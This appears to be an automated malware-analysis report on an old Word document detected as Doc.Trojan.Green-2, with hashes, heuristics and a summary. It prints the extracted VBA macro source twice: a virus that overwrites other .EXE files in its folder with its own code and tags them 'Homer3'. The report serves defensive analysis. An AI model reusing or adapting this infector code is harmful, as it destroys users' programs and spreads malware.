Office (OLE) malware analysis — malicious · b2b261d3ef367290

MALICIOUS

Office (OLE)

28.5 KB Created: 2000-12-30 18:37:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: ea97d5ac219171e983035113500e1dcf SHA-1: 0d36e7f9da78162d49e43eb1a33d1485b6e38d78 SHA-256: b2b261d3ef3672900d02642069d86f21a374b8688e3d7e5be2e100892fbc8e22

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macro code attempts to write a second-stage executable to disk and displays a fake critical information message to the user. The specific string 'Homer3' is appended to the file, likely as a marker or part of the payload.

Heuristics 2

ClamAV: Doc.Trojan.Green-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Green-2
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1651 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1651 bytes
SHA-256: `ccce358919e7f55a9d3a5428f4221e34ba235f596a3da506274408f0dc875a7f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Option Explicit Dim erej() As Byte Dim zrtva As String Const velicina As Integer = 24576 Dim inf_znak As String Dim homer As String Private Sub Form_Load(): On Error Resume Next: GoTo a a: Dim Free: GoTo b b: Free = FreeFile: GoTo c c: Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free: GoTo d d: ReDim erej(velicina): GoTo e e: Get #1, 1, erej: GoTo f f: Close #Free: GoTo g h: While zrtva <> "": GoTo k g: zrtva = Dir(App.Path & "\" & "*.EXE"): GoTo h k: Open App.Path & "\" & zrtva For Binary Access Read As #Free: GoTo l l: homer = Strings.Space(LOF(Free)): GoTo o o: Get #1, 1, homer: GoTo p p: Close #Free: GoTo u u: inf_znak = Mid(homer, Len(homer)): GoTo z z: If Strings.LCase(inf_znak) <> "Homer3" Then: GoTo t t: Open App.Path & "\" & zrtva For Binary Access Write As #Free: GoTo r r: Put #1, , erej: GoTo w w: Put #1, , velicina: GoTo q q: Put #1, LOF(Free) + 6, "Homer3": GoTo s s: Close #Free: GoTo v v: zrtva = Dir(): GoTo n n: Wend If Day(Now()) = 7 Then MsgBox "Ja sam Homer Veliki-Qurac!", vbCritical, "\| Critical Information \|" If Month(Now()) = 7 Then MsgBox "Damn! AVP sux!", vbExclamation, "AVP = 0" 'HLLO.Homer_Tha_Pile 3 by e[ax] 'Greetz to all ppl on #virus 'Pozdravljam cijeli BiHNet.ORG '"My Dream Is My Reality" End If: End If End Sub

SHA-256: ccce358919e7f55a9d3a5428f4221e34ba235f596a3da506274408f0dc875a7f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Option Explicit
 Dim erej() As Byte
 Dim zrtva As String
 Const velicina As Integer = 24576
 Dim inf_znak As String
 Dim homer As String
 Private Sub Form_Load(): On Error Resume Next: GoTo a
a: Dim Free: GoTo b
b: Free = FreeFile: GoTo c
c: Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free: GoTo d
d: ReDim erej(velicina): GoTo e
e: Get #1, 1, erej: GoTo f
f: Close #Free: GoTo g
h: While zrtva <> "": GoTo k
g: zrtva = Dir(App.Path & "\" & "*.EXE"): GoTo h
k: Open App.Path & "\" & zrtva For Binary Access Read As #Free: GoTo l
l: homer = Strings.Space(LOF(Free)): GoTo o
o: Get #1, 1, homer: GoTo p
p: Close #Free: GoTo u
u: inf_znak = Mid(homer, Len(homer)): GoTo z
z: If Strings.LCase(inf_znak) <> "Homer3" Then: GoTo t
t: Open App.Path & "\" & zrtva For Binary Access Write As #Free: GoTo r
r: Put #1, , erej: GoTo w
w: Put #1, , velicina: GoTo q
q: Put #1, LOF(Free) + 6, "Homer3": GoTo s
s: Close #Free: GoTo v
v: zrtva = Dir(): GoTo n
n: Wend
If Day(Now()) = 7 Then
MsgBox "Ja sam Homer Veliki-Qurac!", vbCritical, "| Critical Information |"
If Month(Now()) = 7 Then
MsgBox "Damn! AVP sux!", vbExclamation, "AVP = 0"
'HLLO.Homer_Tha_Pile 3 by e[ax]
 'Greetz to all ppl on #virus
 'Pozdravljam cijeli BiHNet.ORG
 '"My Dream Is My Reality"
End If: End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.